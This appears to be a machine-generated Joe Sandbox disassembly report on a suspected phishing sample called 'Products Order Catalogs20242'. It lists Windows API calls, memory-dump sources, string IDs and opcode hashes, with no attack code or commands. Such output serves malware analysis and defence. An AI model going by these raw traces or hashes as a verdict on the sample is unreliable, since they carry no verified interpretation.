                                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0045DEF0
                                                                                                • _wcsncpy.LIBCMT ref: 0045DF0F
                                                                                                • __wsplitpath.LIBCMT ref: 0045DF54
                                                                                                • _wcscat.LIBCMT ref: 0045DF6C
                                                                                                • _wcscat.LIBCMT ref: 0045DF7E
                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0045DF93
                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFA7
                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFE5
                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFFB
                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0045E00D
                                                                                                • _wcscpy.LIBCMT ref: 0045E019
                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0045E05F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: CurrentDirectory$Time$File$Local_wcscat$System__wsplitpath_wcscpy_wcsncpy
                                                                                                • String ID: *.*
                                                                                                • API String ID: 3201719729-438819550
                                                                                                • Opcode ID: 89541da3f554ebb8d42e95f45bc66f31ca584aff69b040987f949bd9346ecb30
                                                                                                • Instruction ID: 9ef8ac46b2ec3f8a2b66e183c5d6435db2730cdd54c1860218fefef83dfd89d7
                                                                                                • Opcode Fuzzy Hash: 89541da3f554ebb8d42e95f45bc66f31ca584aff69b040987f949bd9346ecb30
                                                                                                • Instruction Fuzzy Hash: D061A7B25043049BC724EF65C881E9FB3E8AF94704F048E1EF98987241DB79E949CB96
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: __wcsicoll$IconLoad
                                                                                                • String ID: blank$info$question$stop$warning
                                                                                                • API String ID: 2485277191-404129466
                                                                                                • Opcode ID: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                                                                                • Instruction ID: 3fdcc892c2a25cebf9aff257507665a297d4e16c4260cb8f6e9492a672fb13e0
                                                                                                • Opcode Fuzzy Hash: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                                                                                • Instruction Fuzzy Hash: CB2128B6B08301A7D610A725BC05FDF27489FA8365F004C2BF941E2283F3A8A45583BD
                                                                                                APIs
                                                                                                • CompareStringW.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428611
                                                                                                • GetLastError.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428627
                                                                                                • strncnt.LIBCMT ref: 00428646
                                                                                                • strncnt.LIBCMT ref: 0042865A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: strncnt$CompareErrorLastString
                                                                                                • String ID:
                                                                                                • API String ID: 1776594460-0
                                                                                                • Opcode ID: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                                                                                                • Instruction ID: 056e5a993d73ec50dc3c8e072878bb631c9b69e1f80941a2a69bbd8adeb14d7f
                                                                                                • Opcode Fuzzy Hash: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                                                                                                • Instruction Fuzzy Hash: 0DA1B131B01225AFDF219F61EC41AAF7BB6AF94340FA4402FF81196251DF3D8891CB58
                                                                                                APIs
                                                                                                • LoadIconW.USER32(?,00000063), ref: 004545DA
                                                                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004545EC
                                                                                                • SetWindowTextW.USER32(?,?), ref: 00454606
                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 0045461F
                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 00454626
                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00454637
                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 0045463E
                                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00454663
                                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 0045467D
                                                                                                • GetWindowRect.USER32(?,?), ref: 00454688
                                                                                                • SetWindowTextW.USER32(?,?), ref: 004546FD
                                                                                                • GetDesktopWindow.USER32 ref: 00454708
                                                                                                • GetWindowRect.USER32(00000000), ref: 0045470F
                                                                                                • MoveWindow.USER32(?,?,00000000,?,?,00000000), ref: 00454760
                                                                                                • GetClientRect.USER32(?,?), ref: 0045476F
                                                                                                • PostMessageW.USER32(?,00000005,00000000,?), ref: 0045479E
                                                                                                • SetTimer.USER32(?,0000040A,?,00000000), ref: 004547E9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                • String ID:
                                                                                                • API String ID: 3869813825-0
                                                                                                • Opcode ID: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                                                                                                • Instruction ID: 4e77de65cc6986e78e6be143d0a4b9e7f39e78804b6f4fc71fe9e35dfcfd5046
                                                                                                • Opcode Fuzzy Hash: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                                                                                                • Instruction Fuzzy Hash: 8C616D71604701AFD320DF68CD88F2BB7E8AB88709F004E1DF98697691D7B8E849CB55
                                                                                                APIs
                                                                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 00458D2D
                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00458D3A
                                                                                                • LoadCursorW.USER32(00000000,00007F03), ref: 00458D47
                                                                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 00458D54
                                                                                                • LoadCursorW.USER32(00000000,00007F01), ref: 00458D61
                                                                                                • LoadCursorW.USER32(00000000,00007F81), ref: 00458D6E
                                                                                                • LoadCursorW.USER32(00000000,00007F88), ref: 00458D7B
                                                                                                • LoadCursorW.USER32(00000000,00007F80), ref: 00458D88
                                                                                                • LoadCursorW.USER32(00000000,00007F86), ref: 00458D95
                                                                                                • LoadCursorW.USER32(00000000,00007F83), ref: 00458DA2
                                                                                                • LoadCursorW.USER32(00000000,00007F85), ref: 00458DAF
                                                                                                • LoadCursorW.USER32(00000000,00007F82), ref: 00458DBC
                                                                                                • LoadCursorW.USER32(00000000,00007F84), ref: 00458DC9
                                                                                                • LoadCursorW.USER32(00000000,00007F04), ref: 00458DD6
                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00458DE3
                                                                                                • LoadCursorW.USER32(00000000,00007F89), ref: 00458DF0
                                                                                                • GetCursorInfo.USER32 ref: 00458E03
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Cursor$Load$Info
                                                                                                • String ID:
                                                                                                • API String ID: 2577412497-0
                                                                                                • Opcode ID: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                                                                                • Instruction ID: 36b4ee280ed0253346847529aeb00c95e660e1b7f2a6688567eec4957a26740b
                                                                                                • Opcode Fuzzy Hash: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                                                                                • Instruction Fuzzy Hash: D9311671E4C3156AE7509F758C5AB1BBEE0AF40B54F004D2FF2889F2D1DAB9E4448B86
                                                                                                APIs
                                                                                                • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 004696CC
                                                                                                • GetFocus.USER32 ref: 004696E0
                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 004696EB
                                                                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046973F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessagePost$CtrlFocus
                                                                                                • String ID: 0
                                                                                                • API String ID: 1534620443-4108050209
                                                                                                • Opcode ID: 833d13db40ec40dec0483232b6284f8533ca83f9805c84b893a2fb0fb577edd9
                                                                                                • Instruction ID: 7d80af5808d25915b866e76daf530f36ef8b085de22dc1c7fc8dbb607ae8adb7
                                                                                                • Opcode Fuzzy Hash: 833d13db40ec40dec0483232b6284f8533ca83f9805c84b893a2fb0fb577edd9
                                                                                                • Instruction Fuzzy Hash: 1591E1B1604301ABD710DF14D884BABB7A8FB89714F004A1EF99497391E7B4DC49CBAB
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 00468107
                                                                                                • GetMenuItemInfoW.USER32(?,00000007,00000000,?), ref: 00468190
                                                                                                • GetMenuItemCount.USER32(?), ref: 00468227
                                                                                                • DeleteMenu.USER32(?,00000005,00000000), ref: 004682B8
                                                                                                • DeleteMenu.USER32(?,00000004,00000000), ref: 004682C1
                                                                                                • DeleteMenu.USER32(?,00000006,00000000,?,00000004,00000000), ref: 004682CA
                                                                                                • DeleteMenu.USER32(00000000,00000003,00000000,?,00000006,00000000,?,00000004,00000000), ref: 004682D3
                                                                                                • GetMenuItemCount.USER32 ref: 004682DC
                                                                                                • SetMenuItemInfoW.USER32 ref: 00468317
                                                                                                • GetCursorPos.USER32(00000000), ref: 00468322
                                                                                                • SetForegroundWindow.USER32(?), ref: 0046832D
                                                                                                • TrackPopupMenuEx.USER32(?,00000000,00000000,00000006,?,00000000,?,?,00000006,00000000,?,00000004,00000000), ref: 00468345
                                                                                                • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468352
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                • String ID: 0
                                                                                                • API String ID: 3993528054-4108050209
                                                                                                • Opcode ID: d5573be1ba1a613c106f8e764602a2d45d8b266f51cd1eb04f60dea375430468
                                                                                                • Instruction ID: a450cccb4b36e122d1eca3afa35c85d1e57e2007e4dd5bc50ce81cada7f4397f
                                                                                                • Opcode Fuzzy Hash: d5573be1ba1a613c106f8e764602a2d45d8b266f51cd1eb04f60dea375430468
                                                                                                • Instruction Fuzzy Hash: 3C71C070648301ABE3309B14CC49F5BB7E8BF86724F244B0EF5A5563D1DBB9A8458B1B
                                                                                                APIs
                                                                                                • DragQueryPoint.SHELL32(?,?), ref: 0046F2DA
                                                                                                  • Part of subcall function 00441CB4: ClientToScreen.USER32(00000000,?), ref: 00441CDE
                                                                                                  • Part of subcall function 00441CB4: GetWindowRect.USER32(?,?), ref: 00441D5A
                                                                                                  • Part of subcall function 00441CB4: PtInRect.USER32(?,?,?), ref: 00441D6F
                                                                                                • SendMessageW.USER32(?), ref: 0046F34C
                                                                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0046F355
                                                                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0046F37F
                                                                                                • _wcscat.LIBCMT ref: 0046F3BC
                                                                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0046F3D1
                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0046F3E3
                                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F3F1
                                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F40E
                                                                                                • DragFinish.SHELL32(?), ref: 0046F414
                                                                                                • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0046F4FC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Drag$Query$FileRect$ClientFinishPointProcScreenWindow_wcscat
                                                                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                • API String ID: 4085615965-3440237614
                                                                                                • Opcode ID: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                                                                • Instruction ID: d92027b63b9478c52a8b17f069484fb886a707b260a555cedefccfc898d4b85d
                                                                                                • Opcode Fuzzy Hash: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                                                                • Instruction Fuzzy Hash: 596170716043009BD700EF54D885E5FB7A8FFC9714F104A2EF99097291D7B8A949CBAA
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: __wcsicoll
                                                                                                • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                                                • API String ID: 3832890014-4202584635
                                                                                                • Opcode ID: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
                                                                                                • Instruction ID: bf73cd225697d97a5a257e466bf5c8c79b4efa22739c650e03c6b1f9c6e9338c
                                                                                                • Opcode Fuzzy Hash: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
                                                                                                • Instruction Fuzzy Hash: 1D01616160562122FE11322A7C03BDF15898F5139AF14447BFC05F1282FF4DDA8692EE
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 004669C4
                                                                                                • _wcsncpy.LIBCMT ref: 00466A21
                                                                                                • _wcsncpy.LIBCMT ref: 00466A4D
                                                                                                  • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                  • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                • _wcstok.LIBCMT ref: 00466A90
                                                                                                  • Part of subcall function 004142A3: __getptd.LIBCMT ref: 004142A9
                                                                                                • _wcstok.LIBCMT ref: 00466B3F
                                                                                                • _wcscpy.LIBCMT ref: 00466BC8
                                                                                                • GetOpenFileNameW.COMDLG32(00000058), ref: 00466CFE
                                                                                                • _wcslen.LIBCMT ref: 00466D1D
                                                                                                • _memset.LIBCMT ref: 00466BEE
                                                                                                  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                • _wcslen.LIBCMT ref: 00466D4B
                                                                                                • GetSaveFileNameW.COMDLG32(00000058), ref: 00466D9E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcslen$FileName_memset_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                                                • String ID: X$HH
                                                                                                • API String ID: 3021350936-1944015008
                                                                                                • Opcode ID: 148ffd08a53066c169799d7010fd2328abbb1436974d200da898f01e024381e3
                                                                                                • Instruction ID: 73e83d7ea4d12cbe09e247b0b8120e99e9ae8af51722f6ce2f45a1bbad6557a4
                                                                                                • Opcode Fuzzy Hash: 148ffd08a53066c169799d7010fd2328abbb1436974d200da898f01e024381e3
                                                                                                • Instruction Fuzzy Hash: D1C1B2715043408BC714EF65C981A9FB3E4BF84304F15892FF949AB292EB78E905CB9B
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 0045F4AE
                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F519
                                                                                                • SetMenuItemInfoW.USER32(00000008,00000004,00000000,?), ref: 0045F556
                                                                                                • Sleep.KERNEL32(000001F4,?,?,00000000,?), ref: 0045F568
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: InfoItemMenu$Sleep_memset
                                                                                                • String ID: 0
                                                                                                • API String ID: 1504565804-4108050209
                                                                                                • Opcode ID: b2eb264578549714347dca4c6cc1c63db220fd8d89572d1a81e0d1d82c6caf25
                                                                                                • Instruction ID: 9e8996cb251b45e9fd8013479734a73363ce4640cf951279a7d2fdadd0934edb
                                                                                                • Opcode Fuzzy Hash: b2eb264578549714347dca4c6cc1c63db220fd8d89572d1a81e0d1d82c6caf25
                                                                                                • Instruction Fuzzy Hash: E171E3711043406BD3109F54DD48FABBBE8EBD5306F04086FFD8587252D6B9A94EC76A
                                                                                                APIs
                                                                                                • DestroyWindow.USER32(?,004A83D8,?), ref: 00455800
                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 00455847
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$CreateDestroy
                                                                                                • String ID: ,$tooltips_class32
                                                                                                • API String ID: 1109047481-3856767331
                                                                                                • Opcode ID: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                                                                                                • Instruction ID: af4df8b80438f92fd5356fe82daba85812243c44dff517d7eb602cf52e2cfce3
                                                                                                • Opcode Fuzzy Hash: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                                                                                                • Instruction Fuzzy Hash: BF719075244704AFE320DB28CC85F7B77E4EB89700F50491EFA8197391E6B5E905CB59
                                                                                                APIs
                                                                                                • _wcsncpy.LIBCMT ref: 0045CCFA
                                                                                                • __wsplitpath.LIBCMT ref: 0045CD3C
                                                                                                • _wcscat.LIBCMT ref: 0045CD51
                                                                                                • _wcscat.LIBCMT ref: 0045CD63
                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000104,?), ref: 0045CD78
                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,00000104,?), ref: 0045CD8C
                                                                                                  • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                                                • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDD0
                                                                                                • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDE6
                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDF8
                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0045CE08
                                                                                                • _wcscpy.LIBCMT ref: 0045CE14
                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CE5A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                                                • String ID: *.*
                                                                                                • API String ID: 1153243558-438819550
                                                                                                • Opcode ID: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
                                                                                                • Instruction ID: 4b7f18f3392d5c51d0b0bcfc25b88d1348604f1c1aa494fd035d881d108a9fe9
                                                                                                • Opcode Fuzzy Hash: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
                                                                                                • Instruction Fuzzy Hash: 0561E5B61043419FD731EF54C885AEBB7E4EB84305F44882FED8983242D67D998E879E
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 00455127
                                                                                                • GetMenuItemInfoW.USER32 ref: 00455146
                                                                                                • DeleteMenu.USER32(?,?,00000000), ref: 004551B2
                                                                                                • DeleteMenu.USER32(?,?,00000000), ref: 004551C8
                                                                                                • GetMenuItemCount.USER32(?), ref: 004551D9
                                                                                                • SetMenu.USER32(?,00000000), ref: 004551E7
